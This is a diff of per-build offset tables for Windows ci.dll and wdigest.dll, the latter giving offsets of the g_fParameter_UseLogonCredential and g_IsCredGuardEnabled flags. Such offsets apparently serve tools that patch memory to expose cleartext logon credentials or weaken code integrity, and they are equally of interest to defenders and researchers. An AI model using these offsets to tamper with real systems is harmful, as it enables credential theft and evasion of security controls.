+ci_16299-334.dll,1cd10,31440
-ci_17763-1131.dll,36d18
+ci_16299-371.dll,1cd10,31450
-ci_17763-1131.dll,36d18
+ci_16299-431.dll,1cd10,31470
-ci_17763-1007.dll,36d18
+ci_16299-432.dll,1cd10,31470
-ci_17763-1282.dll,36d18
+ci_16299-492.dll,1cd10,31670
-ci_17763-1554.dll,36d18
+ci_16299-665.dll,1cd10,31680
-ci_17763-1577.dll,36d18
+ci_16299-1087.dll,1cd10,31680
-ci_17763-10458.dll,36d18
+ci_16299-1237.dll,1dd10,32690
-ci_17763-1757.dll,36d18
+ci_16299-1268.dll,1dd10,32690
-ci_17763-1971.dll,36d18
+ci_16299-1331.dll,1dd10,32690
-ci_17763-2061.dll,36d18
+ci_16299-1480.dll,1dd10,32690
-ci_17763-1790.dll,36d18
+ci_16299-1565.dll,1dd10,32690
-ci_17763-2183.dll,36d18
+ci_16299-10000.dll,1cd10,31670
-ci_17763-2090.dll,36d18
+ci_17134-1.dll,1dcb0,32aa0
-ci_17763-2237.dll,36d18
+ci_17134-80.dll,1dcb0,32aa0
-ci_17763-2510.dll,36d18
+ci_17134-81.dll,1dcb0,32aa0
-ci_17763-2458.dll,36d18
+ci_17134-83.dll,1dcb0,32aa0
-ci_17763-292.dll,36d18
+ci_17134-112.dll,1dcb0,32c90
-ci_17763-2330.dll,36d18
+ci_17134-191.dll,1dc98,32c90
-ci_17763-2369.dll,36d18
+ci_17134-228.dll,1dc98,32c90
-ci_17763-2989.dll,36d18
+ci_17134-285.dll,1dc98,32c90
-ci_17763-2628.dll,36d18
+ci_17134-441.dll,1dc98,32c90
-ci_17763-10877.dll,36d18
+ci_17134-799.dll,1dc98,32ca0
-ci_17763-3406.dll,36d18
+ci_17134-829.dll,1dc98,32ca0
-ci_17763-3165.dll,36d18
+ci_17134-858.dll,1dc98,32ca0
-ci_17763-3532.dll,36d58
+ci_17134-885.dll,1dc98,32ca0
-ci_17763-379.dll,36d18
+ci_17134-950.dll,1dc98,32ca0
-ci_17763-404.dll,36d18
+ci_17134-982.dll,1dc98,32ca0
-ci_17763-3650.dll,36d58
+ci_17134-1006.dll,1dc98,32ca0
-ci_17763-592.dll,36d18
+ci_17134-1067.dll,1dc98,32ca0
-ci_17763-557.dll,36d18
+ci_17134-1098.dll,1dc98,32ca0
-ci_17763-615.dll,36d18
+ci_17134-1130.dll,1dc98,32ca0
-ci_17763-55.dll,36d18
+ci_17134-2090.dll,1dc98,32ca0
-ci_17763-719.dll,36d18
+ci_17134-2208.dll,1dc98,32ca0
-ci_17763-802.dll,36d18
+ci_17763-1.dll,36d18,4ba10
-ci_17763-678.dll,36d18
+ci_17763-55.dll,36d18,4ba10
-ci_18362-53.dll,37278
+ci_17763-253.dll,36d18,4ba10
-ci_18362-1171.dll,37278
+ci_17763-292.dll,36d18,4ba10
-ci_18362-1556.dll,37278
+ci_17763-348.dll,36d18,4b9f0
-ci_18362-1593.dll,38278
+ci_17763-379.dll,36d18,4b9f0
-ci_18362-1020.dll,37278
+ci_17763-404.dll,36d18,4ba30
-ci_18362-1171.dll,37278
+ci_17763-529.dll,36d18,4ba40
-ci_18362-1734.dll,38278
+ci_17763-557.dll,36d18,4ba40
-ci_18362-1049.dll,37278
+ci_17763-592.dll,36d18,4ba40
-ci_18362-1801.dll,38278
+ci_17763-615.dll,36d18,4ba40
-ci_18362-1854.dll,38278
+ci_17763-678.dll,36d18,4ba40
-ci_18362-1679.dll,38278
+ci_17763-719.dll,36d18,4ba40
-ci_18362-2337.dll,38278
+ci_17763-802.dll,36d18,4ba40
-ci_18362-1027.dll,37278
+ci_17763-831.dll,36d18,4ba40
-ci_18362-2039.dll,38278
+ci_17763-1007.dll,36d18,4ba40
-ci_18362-239.dll,37278
+ci_17763-1039.dll,36d18,4ba40
-ci_18362-10013.dll,37278
+ci_17763-1131.dll,36d18,4ba40
-ci_18362-295.dll,37278
+ci_17763-1282.dll,36d18,4ba40
-ci_18362-329.dll,37278
+ci_17763-1490.dll,36d18,4ba40
-ci_18362-387.dll,37278
+ci_17763-1554.dll,36d18,4ba40
-ci_18362-815.dll,37278
+ci_17763-1577.dll,36d18,4ba70
-ci_18362-592.dll,37278
+ci_17763-1613.dll,36d18,4ba70
-ci_18362-900.dll,37278
+ci_17763-1757.dll,36d18,4ba70
-ci_18362-1059.dll,37278
+ci_17763-1790.dll,36d18,4ba70
-ci_19041-208.dll,38378
+ci_17763-1852.dll,36d18,4ba70
-ci_19041-1157.dll,383d8
+ci_17763-1971.dll,36d18,4ba70
-ci_19041-1157.dll,383d8
+ci_17763-2028.dll,36d18,4ba80
-ci_19041-1023.dll,383d8
+ci_17763-2061.dll,36d18,4ba80
-ci_19041-1165.dll,383b8
+ci_17763-2090.dll,36d18,4ba80
-ci_19041-1165.dll,383d8
+ci_17763-2145.dll,36d18,4ba80
-ci_19041-1165.dll,383b8
+ci_17763-2183.dll,36d18,4ba80
-ci_19041-1288.dll,383b8
+ci_17763-2213.dll,36d18,4ba80
-ci_19041-1320.dll,383b8
+ci_17763-2237.dll,36d18,4ba80
-ci_19041-1371.dll,383b8
+ci_17763-2300.dll,36d18,4bad0
-ci_19041-1173.dll,383b8
+ci_17763-2330.dll,36d18,4bad0
-ci_19041-1526.dll,393b8
+ci_17763-2366.dll,36d18,4bad0
-ci_19041-1865.dll,393d8
+ci_17763-2369.dll,36d18,4bad0
-ci_19041-1826.dll,393b8
+ci_17763-2452.dll,36d18,4bad0
-ci_19041-1708.dll,393b8
+ci_17763-2458.dll,36d18,4bad0
-ci_19041-1645.dll,383b8
+ci_17763-2510.dll,36d18,4bad0
-ci_19041-1469.dll,383b8
+ci_17763-2628.dll,36d18,4baa0
-ci_19041-1682.dll,383b8
+ci_17763-2867.dll,36d18,4bb00
-ci_19041-2251.dll,3a438
+ci_17763-2989.dll,36d18,4bb00
-ci_19041-388.dll,38378
+ci_17763-3046.dll,36d18,4bae0
-ci_19041-488.dll,383b8
+ci_17763-3113.dll,36d18,4bae0
-ci_19041-2311.dll,39418
+ci_17763-3165.dll,36d18,4bae0
-ci_19041-870.dll,383b8
+ci_17763-3232.dll,36d18,4bae0
-ci_19041-423.dll,383b8
+ci_17763-3406.dll,36d18,4bae0
-ci_19041-606.dll,383b8
+ci_17763-3469.dll,36d58,4bb30
-ci_22000-132.dll,3d004
+ci_17763-3532.dll,36d58,4bb30
-ci_19041-985.dll,383d8
+ci_17763-3650.dll,36d58,4bb30
-ci_22000-1219.dll,3d004
+ci_17763-3770.dll,36d58,4bb30
-ci_22000-318.dll,3d004
+ci_17763-3772.dll,36d58,4bb30
-ci_22000-1219.dll,3d004
+ci_17763-3887.dll,36d58,4bb30
-ci_22000-347.dll,3d004
+ci_17763-4011.dll,36d58,4bb30
-ci_22000-434.dll,3d004
+ci_17763-4131.dll,36d58,4bb30
-ci_22000-376.dll,3d004
+ci_17763-4252.dll,36d58,4bb30
-ci_22000-613.dll,3d004
+ci_17763-4377.dll,36d58,4bb30
-ci_22000-652.dll,3d004
+ci_17763-4492.dll,36d58,4bb30
-ci_22000-493.dll,3d004
+ci_17763-4504.dll,36d58,4bb30
-ci_22000-675.dll,3d004
+ci_17763-4644.dll,36d58,4bb30
-ci_22000-795.dll,3d004
+ci_17763-4737.dll,36d58,4bb30
-ci_22000-832.dll,3d004
+ci_17763-4840.dll,36d58,4bb30
-ci_22000-740.dll,3d004
+ci_17763-4974.dll,36d58,4bb30
-ci_22000-975.dll,3d004
+ci_17763-10458.dll,36d18,4ba70
-ci_22621-590.dll,41004
+ci_17763-10877.dll,36d18,4bae0
-ci_22621-608.dll,41004
+ci_18362-1.dll,37278,4c600
-ci_22621-815.dll,41004
+ci_18362-53.dll,37278,4c600
-ci_22621-675.dll,41004
+ci_18362-145.dll,37278,4c600
-ci_19041-2075.dll,3a438
+ci_18362-207.dll,37278,4c600
-ci_19041-2364.dll,39418
+ci_18362-239.dll,37278,4c600
 ci_18362-267.dll,37278,4c600
 ci_18362-295.dll,37278,4c600
 ci_18362-329.dll,37278,4c600
 ci_18362-387.dll,37278,4c600
 ci_18362-418.dll,37278,4c600
 ci_18362-592.dll,37278,4c600
 ci_18362-628.dll,37278,4c600
 ci_18362-815.dll,37278,4c600
 ci_18362-900.dll,37278,4c600
 ci_18362-1020.dll,37278,4c600
 ci_18362-1027.dll,37278,4c600
 ci_18362-1049.dll,37278,4c600
 ci_18362-1059.dll,37278,4c600
 ci_18362-1110.dll,37278,4c600
 ci_18362-1171.dll,37278,4c600
 ci_18362-1237.dll,37278,4c600
 ci_18362-1556.dll,37278,4c600
 ci_18362-1593.dll,38278,4d600
 ci_18362-1679.dll,38278,4d600
 ci_18362-1714.dll,38278,4d600
 ci_18362-1734.dll,38278,4d600
 ci_18362-1766.dll,38278,4d600
 ci_18362-1801.dll,38278,4d600
 ci_18362-1832.dll,38278,4d600
 ci_18362-1854.dll,38278,4d600
 ci_18362-2037.dll,38278,4d600
 ci_18362-2039.dll,38278,4d600
 ci_18362-2274.dll,38278,4d660
 ci_18362-2337.dll,38278,4d660
 ci_18362-10013.dll,37278,4c600
 ci_19041-1.dll,38378,4dae0
 ci_19041-208.dll,38378,4dae0
 ci_19041-329.dll,38378,4dae0
 ci_19041-388.dll,38378,4dae0
 ci_19041-423.dll,383b8,4f1d0
 ci_19041-488.dll,383b8,4f1d0
 ci_19041-546.dll,383b8,4f1d0
 ci_19041-606.dll,383b8,4f1d0
 ci_19041-662.dll,383b8,4f1d0
 ci_19041-870.dll,383b8,4f1d0
 ci_19041-964.dll,383d8,4f4d0
 ci_19041-985.dll,383d8,4f4d0
 ci_19041-1023.dll,383d8,4f4d0
 ci_19041-1081.dll,383d8,4f4e0
 ci_19041-1110.dll,383d8,4f4e0
 ci_19041-1151.dll,383d8,4f4e0
 ci_19041-1157.dll,383d8,4f4e0
 ci_19041-1165.dll,383b8,4f4e0
 ci_19041-1165.dll,383d8,4f4e0
 ci_19041-1173.dll,383b8,4f510
 ci_19041-1202.dll,383b8,4f4e0
 ci_19041-1221.dll,39418,50680
 ci_19041-1223.dll,39418,50680
 ci_19041-1237.dll,383b8,4f4e0
 ci_19041-1266.dll,383b8,4f4e0
 ci_19041-1288.dll,383b8,4f4e0
 ci_19041-1320.dll,383b8,4f510
 ci_19041-1348.dll,383b8,4f510
 ci_19041-1371.dll,383b8,4f510
 ci_19041-1415.dll,383b8,4f510
 ci_19041-1466.dll,383b8,4f510
 ci_19041-1469.dll,383b8,4f510
 ci_19041-1503.dll,393b8,505c0
 ci_19041-1526.dll,393b8,505c0
 ci_19041-1566.dll,383b8,4f5b0
 ci_19041-1645.dll,383b8,4f5b0
 ci_19041-1682.dll,383b8,4f630
 ci_19041-1706.dll,393b8,50610
 ci_19041-1708.dll,393b8,50610
 ci_19041-1741.dll,393b8,50610
 ci_19041-1826.dll,393b8,50610
 ci_19041-1865.dll,393d8,50610
 ci_19041-2075.dll,3a438,51680
 ci_19041-2251.dll,3a438,51680
 ci_19041-2311.dll,39418,50680
 ci_19041-2364.dll,39418,50680
 ci_19041-2486.dll,39418,50680
 ci_19041-2546.dll,39418,50680
 ci_19041-2788.dll,39418,50680
 ci_19041-2846.dll,39418,50680
 ci_19041-2913.dll,39418,50680
 ci_19041-2965.dll,39418,50680
 ci_19041-3031.dll,39418,50680
 ci_19041-3083.dll,39418,50680
 ci_19041-3086.dll,39418,50680
 ci_19041-3205.dll,39418,50680
 ci_19041-3208.dll,39418,50680
 ci_19041-3271.dll,39418,50680
 ci_19041-3324.dll,39418,50680
 ci_19041-3393.dll,393f8,50680
 ci_19041-3505.dll,393f8,50680
 ci_19041-3516.dll,39418,50680
 ci_19041-3570.dll,39418,50680
 ci_19041-3636.dll,3a438,51b60
 ci_22000-100.dll,3d004,4c3a0
 ci_22000-132.dll,3d004,4c3a0
 ci_22000-318.dll,3d004,4c3a0
 ci_22000-347.dll,3d004,4c3a0
 ci_22000-348.dll,3d004,4c3a0
 ci_22000-376.dll,3d004,4c3a0
 ci_22000-434.dll,3d004,4c3a0
 ci_22000-469.dll,3d004,4c3a0
 ci_22000-493.dll,3d004,4c3a0
 ci_22000-527.dll,3d004,4c3a0
 ci_22000-613.dll,3d004,4c3a0
 ci_22000-652.dll,3d004,4c3e0
 ci_22000-675.dll,3d004,4c3c0
 ci_22000-708.dll,3d004,4c3c0
 ci_22000-740.dll,3d004,4c3c0
 ci_22000-778.dll,3d004,4c3c0
 ci_22000-795.dll,3d004,4c3c0
 ci_22000-832.dll,3d004,4c6a0
 ci_22000-918.dll,3d004,4c6a0
 ci_22000-975.dll,3d004,4c6a0
 ci_22000-1042.dll,3d004,4c700
 ci_22000-1165.dll,3d004,4c700
 ci_22000-1219.dll,3d004,4c700
 ci_22000-1281.dll,3d004,4c700
 ci_22000-1335.dll,3d004,4c700
 ci_22000-1455.dll,3d004,4c700
 ci_22000-1516.dll,3d004,4c700
 ci_22000-1696.dll,3d004,4c700
 ci_22000-1817.dll,3d004,4c700
 ci_22000-1880.dll,3d004,4c700
 ci_22000-1936.dll,3d004,4c700
 ci_22000-2054.dll,3d004,4c700
 ci_22000-2057.dll,3d004,4c700
 ci_22000-2176.dll,3d004,4c700
 ci_22000-2295.dll,3d004,4c700
 ci_22000-2360.dll,3d004,4c700
 ci_22000-2416.dll,3d004,4c700
 ci_22000-2482.dll,3d004,4c750
 ci_22000-2538.dll,3d004,4c750
 ci_22621-317.dll,41004,51e00
 ci_22621-590.dll,41004,51e00
 ci_22621-608.dll,41004,51e00
 ci_22621-674.dll,41004,51e00
 ci_22621-675.dll,41004,51e00
 ci_22621-755.dll,41004,51e00
 ci_22621-815.dll,41004,51e00
 ci_22621-900.dll,41004,52350
 ci_22621-963.dll,41004,52350
 ci_22621-1028.dll,41004,52350
 ci_22621-1095.dll,41004,52350
 ci_22621-1105.dll,41004,52350
 ci_22621-1125.dll,43004,54070
 ci_22621-1180.dll,41004,52350
 ci_22621-1194.dll,43004,54370
 ci_22621-1244.dll,43004,540a0
 ci_22621-1255.dll,43004,54370
 ci_22621-1265.dll,43004,54370
 ci_22621-1344.dll,42004,53370
 ci_22621-1470.dll,42004,53370
 ci_22621-1485.dll,42004,53040
 ci_22621-1555.dll,42004,53040
 ci_22621-1690.dll,42004,53040
 ci_22621-1702.dll,42004,53040
 ci_22621-1778.dll,42004,53040
 ci_22621-1848.dll,42004,53040
 ci_22621-1906.dll,42004,53040
 ci_22621-1928.dll,44004,55080
 ci_22621-1972.dll,44004,55080
 ci_22621-1992.dll,44004,55080
 ci_22621-2050.dll,44004,55080
 ci_22621-2062.dll,43004,54070
 ci_22621-2070.dll,43004,54070
 ci_22621-2134.dll,43004,54070
 ci_22621-2209.dll,43004,540a0
 ci_22621-2215.dll,43004,540a0
 ci_22621-2283.dll,43004,540a0
 ci_22621-2361.dll,43004,540a0
 ci_22621-2420.dll,43004,540a0
 ci_22621-2506.dll,44004,55580
 ci_22621-2700.dll,44004,55580
@@ -1,35 +1,77 @@
-wdigestVersion,g_fParameter_UseLogonCredentialOffset,g_IsCredGuardEnabledOffset
+imageVersion,g_fParameter_UseLogonCredential,g_IsCredGuardEnabled
 wdigest_10240-16384.dll,35134,0
 wdigest_10240-17184.dll,35144,34ba0
 wdigest_10240-18244.dll,35144,34ba0
 wdigest_10240-18608.dll,35144,34ba0
 wdigest_10586-0.dll,35db0,35ba8
 wdigest_15254-245.dll,34d8c,34b88
 wdigest_10240-17184.dll,35144,34ba0
 wdigest_14393-3750.dll,35dc0,35ba8
 wdigest_15063-1868.dll,34d8c,34b88
 wdigest_14393-0.dll,35dc0,35ba8
 wdigest_14393-3808.dll,35dc0,35ba8
 wdigest_10240-18638.dll,35144,34ba0
 wdigest_10586-0.dll,35db0,35ba8
 wdigest_14393-0.dll,35dc0,35ba8
 wdigest_14393-3024.dll,35dc0,35ba8
-wdigest_10240-16384.dll,35134,0
+wdigest_14393-3750.dll,35dc0,35ba8
 wdigest_14393-3808.dll,35dc0,35ba8
 wdigest_15063-0.dll,34d8c,34b88
 wdigest_15063-1868.dll,34d8c,34b88
 wdigest_15063-2409.dll,34d8c,34b88
 wdigest_15063-2411.dll,34d8c,34b88
 wdigest_15254-245.dll,34d8c,34b88
 wdigest_16299-15.dll,35114,34b88
 wdigest_16299-192.dll,35114,34b88
 wdigest_16299-1937.dll,35114,34b88
 wdigest_16299-1217.dll,35114,34b88
-wdigest_17134-1610.dll,36114,35b88
+wdigest_16299-1932.dll,35114,34b88
 wdigest_16299-1937.dll,35114,34b88
 wdigest_16299-1992.dll,35114,34b88
-wdigest_17134-829.dll,35114,34b88
+wdigest_17134-1.dll,35114,34b88
 wdigest_17134-590.dll,35114,34b88
 wdigest_17134-829.dll,35114,34b88
 wdigest_17134-1550.dll,35114,34b88
 wdigest_17134-1553.dll,35114,34b88
 wdigest_17134-1610.dll,36114,35b88
 wdigest_17763-1.dll,35114,34b88
 wdigest_17763-194.dll,35114,34b88
 wdigest_17763-1339.dll,36114,35b88
 wdigest_17763-1294.dll,35114,34b88
 wdigest_17763-557.dll,35114,34b88
 wdigest_17763-1282.dll,35114,34b88
 wdigest_17763-1294.dll,35114,34b88
 wdigest_17763-1339.dll,36114,35b88
 wdigest_17763-3650.dll,38244,37c08
 wdigest_17763-3772.dll,38244,37c08
 wdigest_17763-3887.dll,38234,37c08
 wdigest_17763-4011.dll,38234,37c08
 wdigest_17763-4131.dll,38234,37c08
 wdigest_17763-4974.dll,428c4,421b8
 wdigest_18362-1.dll,35124,34b88
 wdigest_18362-175.dll,35124,34b88
-wdigest_18362-959.dll,36124,35b88
+wdigest_18362-900.dll,35124,34b88
 wdigest_19041-1001.dll,361b4,35c08
 wdigest_18362-904.dll,35124,34b88
-wdigest_19041-388.dll,361b4,35c08
+wdigest_18362-959.dll,36124,35b88
 wdigest_19041-329.dll,361b4,35c08
 wdigest_22406-1000.dll,3caa4,3cab0
 wdigest_18362-1216.dll,35124,34b88
-wdigest_15063-968.dll,29b24,29708
+wdigest_19041-1.dll,361b4,35c08
-wdigest_22000-4.dll,2ab7c,2a760
+wdigest_19041-329.dll,361b4,35c08
 wdigest_19041-388.dll,361b4,35c08
 wdigest_19041-1001.dll,361b4,35c08
 wdigest_19041-2193.dll,3a2e4,39ca8
 wdigest_19041-2604.dll,3a2e4,39ca8
 wdigest_19041-2673.dll,392b4,38c88
 wdigest_19041-3393.dll,45a24,452e8
 wdigest_19041-3505.dll,45a24,452e8
 wdigest_19041-3516.dll,45a14,452e8
 wdigest_19041-3570.dll,45a14,452e8
 wdigest_19041-3636.dll,45a14,452e8
 wdigest_22000-1.dll,3caa4,3cab0
 wdigest_22000-434.dll,3caa4,3cab0
 wdigest_22000-1030.dll,3caa4,3cab0
 wdigest_22000-1165.dll,3ebdc,3ebe8
 wdigest_22000-1516.dll,3ebdc,3ebe8
 wdigest_22000-1641.dll,3dbbc,3dbc8
 wdigest_22000-1696.dll,3dbbc,3dbc8
 wdigest_22000-2245.dll,4b57c,4b588
 wdigest_22000-2474.dll,4b57c,4b588
 wdigest_22000-2482.dll,4a56c,4a578
 wdigest_22000-2538.dll,4a56c,4a578
 wdigest_22406-1000.dll,3caa4,3cab0
 wdigest_22621-1.dll,3ec0c,3ec18
 wdigest_22621-1244.dll,4b5ac,4b5b8
 wdigest_22621-1364.dll,3ec0c,3ec18
 wdigest_22621-2070.dll,4b5ac,4b5b8
 wdigest_22621-2361.dll,4b59c,4b5a8
 wdigest_22621-2506.dll,4b59c,4b5a8
 wdigest_22621-2700.dll,4b59c,4b5a8